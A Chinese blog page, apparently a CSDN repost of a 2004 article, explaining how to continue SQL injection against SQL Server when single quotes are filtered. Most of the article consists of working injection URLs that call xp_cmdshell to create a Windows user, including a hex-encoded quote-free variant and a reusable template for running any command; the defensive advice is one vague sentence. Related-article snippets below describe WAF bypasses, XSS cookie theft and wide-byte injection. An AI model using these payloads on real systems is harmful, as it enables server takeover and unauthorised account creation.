饶过'(单引号)限制继续射入

最新推荐文章于 2022-01-01 17:03:22 发布
原创 最新推荐文章于 2022-01-01 17:03:22 发布 · 687 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #sql server #command #user #c

本文作者:angel
文章性质:原创
发布日期:2004-04-02
  我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的,包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下:

http://www.ilikeplmm.com/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--


  这往往给大家造成误解,认为只要变量过滤了'就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤'是不够的,在'被过滤的情况下我们照样玩,看下面语句:

http://www.ilikeplmm.com/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--


  是不是跟上面的那句有很大区别?可是效果完全是一样的。其实这些都是SQL语句。

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400


  这句是“net user angel pass /add”的16进制格式。了解SQL的朋友就容易明白,先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:

declare @a sysname
select @a=<command>
exec master.dbo.xp_cmdshell @a


解决办法:

  过滤变量,限制只允许输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体就不说了。这完全是程序作者自由发挥了。
amh
关注
专栏目录
mysql 16进制 绕过_SQL注入WAF绕过
weixin_31796803的博客
02-01 891
SQL注入WAF绕过(1)大小写绕过此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤只过滤其中一种。(2)替换关键字这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1...
sqlmap绕过d盾_记一次很迷的绕过D盾的经历
weixin_39949473的博客
12-09 2688
今天上课的时候,无聊的我看着qq中的群聊,突然看到一个学弟说有个存在D盾的站绕不过去,我心想到我展现自己的时候了,互加好友之后,也拿到了站点。一个单引号打过去给我拦截了。被拦截了,也要想办法毕竟不能丢脸,尝试了很多办法都没有绕过。睡着还被老师发现,让我站起来回答问题,啊这,我灵机一动说我趴着听课呢?逃过一劫,但做人不能放弃啊,我下课直接去吃饭了,已经放弃的我打算写作业,然后又想起来那个站...
oracle注入过滤了单引号,sql绕过单引号限制继续注入的解决方法
weixin_39547596的博客
04-05 1609
在防范sql注入时,对变量过滤不足甚至没有过滤而构造畸形SQL语句,极有可能被成功注入,比如下面这行sql,相当轻松就注入成功了:代码示例:http://www./show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--大家可能觉得变量过滤了'就可以防止SQL Injection攻击,仅仅过滤'是不够的,在'被过...
Bypass D盾_IIS防火墙SQL注入防御(多姿势)
09-14 1618
&#13; 0X01 前言&#13;   D盾_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D盾新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL...
网络安全——绕过
W981113的博客
01-01 4260
1.编码的问题 http在传输特殊字符时需要在浏览器中编码,常见的比如空格、回车符等 编码是有规定的,但是具体如何编码没有规定,不同浏览器编码方案不一致,不同字段编码方案也不一样 结论:所有浏览器都有编码的习惯,那么后台接收数据时。首先需要处理编码就是解码,解码是把已编码的字符还原,其余未编码的不动。 2.实际测试 当对浏览器的输入区域进行输入字符时会出现两种情况: 1.输入的字段被浏览器自动编码,例如输入空格,浏览器自动编码为%20,传输时http中也是%20形式传输的 2.输入的字段是编码形式,浏览器自
XSS绕过单引号限制
xiaopan233的博客
05-28 1万+
某视频网站,我在随处逛逛后发现了一个通过发送get请求来进行iframe连接的网页 有iframe。第一个想到的就是通过js伪代码来制造xss 所以我就简单写了一个alert 可以成功执行。没有过滤javascript:。那么我们尝试获取cookie。 也可以。并没有做过滤。那我们稍微修改一下。让cookie发到我的服务器不就可以盗取用户凭据了吗。 简单的写了个发送cooki...
通过两道CTF题学习过滤单引号SQL注入
热门推荐
Lethe's Blog
03-24 2万+
0x00 前言 通常来说,在进行字符型的SQL注入时,都需要先将前面的引号等(以单引号为例)进行闭合才能执行我们构造的SQL语句,那么如果单引号被过滤了,是否还能够成功的SQL注入呢? 答案是可以,当你在判断登录时使用的是如下SQL语句: select user from user where user='$_POST[username]' and password='$_POST[passwor...
sql宽字节注入,绕过单引号
weixin_34149796的博客
08-04 1770
参加下面: http://leapar.lofter.com/post/122a03_3028a9 http://huaidan.org/archives/2268.html   https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
渗透之——SQL注入绕过技术总结
冰河的专栏
01-05 5081
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/85869703 1.绕过空格(注释符/* */,%a0) 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用...
SQL注入中绕过 单引号 限制继续注入
01-02
包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下: 代码如下: //www.jb51.net/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;– 这往往给大家造成误解,认为只要变量过滤了’就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤’是不够的,在’被过滤的情况下我们照样玩,看下面语句: 代码如下: //www.jb51.net/show.asp?id=1;declare%
绕过D盾,D盾实战绕过
11-18
绕过D盾实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
sqlmap绕过d盾_各种姿势绕过WAF
weixin_39683858的博客
12-09 2596
常在河边走,哪有不被狗咬的,记得我刚学渗透时经常遇见"狗",一不小心就弹出这个鬼东西,以前学的那些大小写绕过之类的技巧在这狗面前根本不管用,这还渗透个屁啊!看到这个页面我相信很多小白也是头皮发麻就想放弃了,今天我带来了我家祖传的狗头铡第一种正常情况下get传参这块被各大waf厂商杀的很惨,众所周知把get改成post一样可以正常请求,同时这也是最简单的绕waf姿势把GET改为POST后把...
Sqli-labs2-5单引号变形,双引号,双注入
Recar的博客
12-12 4395
第二题第二个就是整形的了第一个是字符串的整形与字符注入的区别!!!整形是不用单引号闭合的,不要后面注释直接 union联合查询就可以了~~ 接下来就可以继续向第一题那样测试了整型不需要闭合就可以执行后面的语句,字符型的则要闭合http://localhost:9096/sqli-labs/Less-2/?id=-1 union select 1,2,table_name from informat
PHP中单引号、双引号和转义字符
weixin_30451709的博客
08-20 390
在PHP语言总,单引号与双引号的作用不尽相同。 PHP单引号及双引号均可以修饰字符串类型的数据,如果修饰的字符串中含有变量(例$name);最大的区别是:双引号会替换变量的值,而单引号会把它当做字符串输出。 例如: <?php $name="string"; echo "字符串" . '$name'; echo "字符串"...
mysql 16进制 绕过_Web中常见的绕过和技巧
weixin_39821189的博客
01-18 725
SQL注入十六进制绕过引号slect table_name from information_schema.table where table_schema="sqli";slect table_name from information_schema.table where table_schema=0x73716c69;slect table_name from information_sch...
奇淫技巧:不使用单引号和逗号进行SQL注入bypass
Coisini的博客
06-17 1853
0X00 背景 审计cms发现一个这样的环境: $l_id = get('arr','l_id'); $ids = explode(',',$l_id); 拼接post中数组的请求,然后再用逗号分隔,最后带入了SQL查询。 于是就遇到了不能使用逗号的情况。 默认 display_error=off 无显错,只能盲注。 0X01解决方案: 主要解决substring的逗号问题。 参考文档: ht...
Bypass之D盾IIS防火墙SQL联合注入绕过(新版)
18年3月萌新白帽子
07-04 1万+
这种技术文章,不好意思标原创了,一下内容均来自公众号Bypass实验环境IIS+ASPX+MSSQL一、MSSQL特性在MSSQL中,参数和union之间的位置,常见的可填充的方式有如下几种:1.空白字符01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,202.注...
怎么过付费 下载数据
最新发布
04-03
合法获取受付费墙保护的数据通常涉及遵循法律框架和技术规范。以下是一些方法和注意事项: ### 合法绕过付费墙的方式 #### 1. 使用公共数据源 许多政府机构、学术研究组织以及非营利性团体提供了大量免费的开放数据集。可以尝试查找是否有类似的公开数据满足需求[^2]。 #### 2. 利用图书馆或教育机构访问权限 部分高校或科研单位订阅了多种数据库服务,成员可以通过学校账号获得授权访问受限内容。如果符合条件,则可利用此类资源来合法获取所需资料而无需直接面对商业平台上的收费壁垒[^3]。 #### 3. 寻找替代工具和服务 有时存在功能相似但采用不同商业模式的产品可供选择。例如某些开源项目能够提供基本功能却免去了昂贵费用支出;或者通过API接口调用来实现特定目的而不是整套购买解决方案[^4]。 #### 4. 遵守robots协议并调整爬虫设置 当自动化抓取网页信息时,请务必尊重目标站点设定好的`Robots.txt`文件指示,并适当降低请求频率以免给对方服务器带来过大负担。这不仅有助于维护良好的网络生态秩序,也是避免触犯法律法规的有效手段之一。 ```python import time from urllib.robotparser import RobotFileParser def can_fetch(url, user_agent='*'): rp = RobotFileParser() rp.set_url(f"{url}/robots.txt") rp.read() return rp.can_fetch(user_agent, url) if __name__ == "__main__": target_website = "http://example.com" if not can_fetch(target_website): print("Access denied by robots.txt.") else: while True: # Your data fetching logic here time.sleep(5) # Respectful delay between requests. ``` 请注意以上代码仅为示例用途展示如何检测是否允许爬取某个网址下的页面内容,并加入等待时间间隔以减少对远程主机的压力影响。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值